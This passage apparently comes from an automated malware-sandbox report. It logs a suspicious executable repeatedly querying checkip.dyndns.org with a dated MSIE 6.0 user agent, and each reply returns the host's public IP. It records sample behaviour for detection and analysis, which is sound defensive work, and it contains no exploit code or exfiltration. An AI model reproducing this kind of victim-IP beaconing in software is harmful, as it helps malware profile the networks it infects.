                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.949993132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:11.637964964 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:12.316365957 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:12 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.949995132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:13.293323040 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:13.975909948 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:13 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.949997132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:14.874728918 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:15.584177971 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:15 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.949999132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:17.141777039 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:17.826138973 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:17 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.950001132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:18.770514011 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:19.448154926 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:19 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.950003132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:20.295130014 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:21.003470898 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:20 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.950005132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:21.973793030 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:22.674274921 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:22 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.950007132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:24.529258013 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:25.224337101 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:25 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          16192.168.2.950009132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:26.232584000 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:26.935705900 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:26 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          17192.168.2.950011132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:27.877578974 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:28.562705994 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:28 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          18192.168.2.950013132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:29.449084997 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:30.129235983 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:30 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          19192.168.2.950015132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:31.081629038 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:31.791682005 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:31 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          20192.168.2.950017132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:32.726120949 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:33.409117937 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:33 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          21192.168.2.950019132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:34.316557884 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:35.010158062 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:34 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          22192.168.2.950021132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:35.911058903 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:36.591614962 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:36 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          23192.168.2.950023132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:37.526413918 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:38.196589947 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:38 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          24192.168.2.950025132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:39.051131010 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:39.750917912 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:39 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          25192.168.2.950027132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:40.823911905 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:41.525806904 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:41 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          26192.168.2.950029132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:42.375016928 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:43.047513008 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:42 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          27192.168.2.950031132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:43.994162083 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:44.685190916 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:44 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
